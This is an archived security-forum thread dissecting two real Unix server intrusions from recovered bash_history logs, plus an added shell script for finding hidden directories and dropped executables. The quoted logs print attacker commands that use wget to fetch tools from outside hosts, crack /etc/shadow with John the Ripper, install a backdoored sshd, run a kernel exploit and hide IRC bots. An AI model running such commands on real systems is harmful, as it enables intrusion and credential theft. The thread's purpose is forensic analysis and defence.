Antionline Forums - Maximum Security for a Connected World > Security Discussions > *nix Security Discussions

*nix Security Discussions: Security issues related to *nix & *nix apps.

August 30th, 2005, 12:36 AM   #1
gore
AO BOFH: Luser Abuser (Moderator)
Join Date: Oct 2002
Location: Michigan
Posts: 6,608
THIS is how you hack a web server!

From: steve@example.org
To: incidents@securityfocus.com
Subject: SSH compiled with backdoor

Hi!

One of my web servers was hacked on July 17, 2005. bash_history
showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it appears the
hacker came in from the website account, and did an su from there.

I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the ssh installed must have logging
turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).

Last showed:
reboot    system boot  2.4.18-bf2.4    Sun Jul 17 18:15           (37+11:47)
website   pts/0        193.231.77.74   Sun Jul 17 17:42 - down    (00:27)
website   pts/1        193.231.77.74   Sun Jul 17 17:05 - 17:26   (00:20)
website   pts/0        211.43.207.169  Sun Jul 17 16:26 - 17:41   (01:14)

whois says:
inetnum: 193.231.77.0 - 193.231.77.255
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA

Best Regards,

Steve


----------------
__________________
Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits We Are 138
Cannibal Holocaust
SuSE Linux
Slackware Linux

August 30th, 2005, 01:03 AM   #2
gore
AO BOFH: Luser Abuser (Moderator)
Join Date: Oct 2002
Location: Michigan
Posts: 6,608
Shit forgot something:

I posted this because I thought it was very interesting and it showed a common way to hack a computer running a Unix OS.



w

The first command they ran was "w" which was probably to see who was online and if root was sitting at the console or not and OF COURSE check the uptime maybe to take a guess as to when the last reboot was. This helps find an exploit that the machine may not have installed. Though this tech works better on Windows where EVERY patch needs a reboot.


wget geocities.com/cretu_2004/john-1.6.tar.gz

They used wget to grab a file on their own website which was a hacked version of a common application used by admins.


tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow

They remove the downloaded file so the admin doesn't find it.

wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h

Editing the header file.

cd ../..
./configure --without-x
make
make install

Installing the backdoored app.

mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd

Removing the actual applications to make room for their hacked copy.

cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart

A mild **** up

w

Check if anyone is going to notice a reboot

reboot

Pow.
August 30th, 2005, 01:28 AM   #3
zencoder
AO Senior Cow-beller
Moderator
Join Date: Dec 2004
Posts: 1,172
Tight. And it shows it wasn't a script that did this...or if it was, it was interrupted and manually completed. I wonder how long that took to do? Reading through it, I feel a sense of urgency for the punk. Not that it matters, really. I don't know about you guys, but if I am so paranoid that I have to run w every few minutes to see who's doing what, I need a beer, a valium, and a new line of work.
__________________
"Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
"America has a lottery mentality. We think we can party till we're 40, fail in business after business, and then somehow wind up as president of the United States." -- Bill Maher

August 30th, 2005, 01:36 AM   #4
|3lack|ce
TheTAZZone |ceWriterguy
Join Date: Aug 2004
Posts: 1,609
Yah, looks a bit paranoid, but if you're stealing, you keep looking over your shoulder to see if anyone's watching you. That's how they catch shoplifters in retail. Gotta admit the kid's good, but only if the dl'd file is untraceable (did he go to the library or school computer lab to upload it the first time out?). Else with enough log checking and cooperation he can be found.
__________________
Even a broken watch is correct twice a day.

Which coder said that nobody could outcode Microsoft in their own OS? Write a bit and make a fortune!

August 30th, 2005, 02:04 AM   #5
¤The¤SpeŠialist
Banned
Join Date: May 2005
Posts: 173
Quote:
Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you.
Quote:
I'm such an arrogant egotistical cocky self centered ****er!
Yeah, we really are 138.

August 30th, 2005, 03:10 AM   #6
gore
AO BOFH: Luser Abuser (Moderator)
Join Date: Oct 2002
Location: Michigan
Posts: 6,608
LOL!

Does this face look almost mean?

August 30th, 2005, 03:29 AM   #7
¤The¤SpeŠialist
Banned
Join Date: May 2005
Posts: 173
Your face looks like... my ass.
Ermmm... goatse style.

Your a sexy man.
http://crime.about.com/od/history/qt...ords_gracy.htm

August 30th, 2005, 05:01 AM   #8
catch
Banned
Join Date: May 2003
Posts: 1,004
And yet they didn't sanitize the bash_history?

cheers,

catch

August 30th, 2005, 08:41 AM   #9
the_JinX
Leftie Linux Lover
Join Date: Nov 2001
Location: Beverwijk Netherlands
Posts: 2,528
I had something along these lines happen to a box of a friend.. Just a 'toy' linux box..
An ssh 'knocker' found a weak user (user: print, passwd: print (that's plain stupid))

A few minutes later came the 'hacker'
Or should I say lamer.. let's dissect..

.bash_history
Code:
w
passwd
changed password
Code:
w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "
A nice hard-to-find folder
Code:
ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte
old kernel exploit (ptrace) won't work
Code:
w
rm -rf mremap_pte
wget www.partyzone.go.ro/hide.tgz
tar xzvf hide.tgz
./hide root 0 0
Dude.. you aren't root.. that won't work
Code:
ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit
Ok.. so you installed a irc-bot as a 'normal' user behind a NAT (he could have known this won't work) while you have a valid login (with your own password)..
Code:
export PATH='.'
psybnc
ls
exit
Still won't work
Code:
export PATH='.'
crond
exit
I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..
Code:
ww
typo
Code:
w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a
Should have done that a bit earlier.. could have saved you some time
Code:
wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc
OK he found out such a bot won't work behind a NAT
Code:
wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech "..   .bot"
cd "..   .bot"
sh
And that's where the bot sent enough mail to trigger the ISP to kill the connection :P

Leaving the poor 'hacker' disconnected and all the evidence of his mishaps there for us to look at...
__________________
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.

Get your ass over to SLAYRadio the best station for C64 Remixes !
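An added example, not part of the_JinX's post: two find-based checks for what that history leaves behind in a world-writable directory, namely entries whose names are built from spaces and dots (mkdir " ", mv mech "..   .bot") and executables dropped there (psybnc renamed to "backup" and run via PATH='.'). The function names (odd_names, tmp_executables, simulate_vartmp) are hypothetical and the scratch /var/tmp is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the_JinX's post: hunt hidden-name entries and
# dropped executables in a world-writable directory such as /var/tmp.
# Function names are hypothetical; the scenario at the bottom is constructed.

# Paths under DIR where any component is only spaces/dots, starts with "..",
# or contains whitespace or control characters.  A plain "ls" shows " " as
# nothing and "..   .bot" as clutter, so look for them explicitly.
odd_names() {
    find "$1" ! -path "$1" -print | awk -F/ '
        {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^[ .]+$/ || $i ~ /^\.\./ || $i ~ /[[:space:][:cntrl:]]/) {
                    print; break
                }
        }' | LC_ALL=C sort
}

# Regular files with the owner-execute bit under DIR: a bouncer or exploit
# binary has to be executable, whatever it was renamed to.
tmp_executables() {
    find "$1" -type f -perm -100 -print | LC_ALL=C sort
}

# Constructed scenario: rebuild the_JinX's /var/tmp in a scratch directory
# and report what the two checks find.
simulate_vartmp() {
    root=$(mktemp -d)
    mkdir "$root/ "                                      # mkdir " "
    mkdir "$root/..   .bot"                              # mv mech "..   .bot"
    printf 'quarterly numbers\n' > "$root/report.txt"    # the one honest file
    printf 'psybnc\n' > "$root/ /backup";       chmod 700 "$root/ /backup"
    printf 'mech\n'   > "$root/..   .bot/mech"; chmod 755 "$root/..   .bot/mech"
    echo "== odd names =="
    odd_names "$root" | sed "s|^$root/||"
    echo "== executables =="
    tmp_executables "$root" | sed "s|^$root/||"
    rm -rf "$root"
}

simulate_vartmp
```

Both checks are line-based, so a name containing a newline would split across two lines; with GNU find use -print0 and a NUL-aware consumer for that case. Run them over /tmp, /var/tmp and /dev/shm, and over every user's home directory, since none of this needed root.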

August 30th, 2005, 09:09 AM   #10
Cemetric
Senior Member
Join Date: Oct 2002
Posts: 491
Very nice these dissections ... I like 'em for seeing how they do it ... but then again if you get the logs and can see what they did, doesn't that mean they forgot to delete their evidence??.. Like catch said! So that gets the discussion going of how good they are, or maybe they just don't care.

But of course if they did it from a public computer then would the evidence matter?
Mmm wait it might if the place where the public computer stands keeps a record of who is using it (by means of driver license etc.. but these can be fake also)... just ranting, never mind

Quote:
ww
I don't think it's a typo ...he got nervous and started to stutter

C.
__________________
Back when I was a boy, we carved our own IC's out of wood.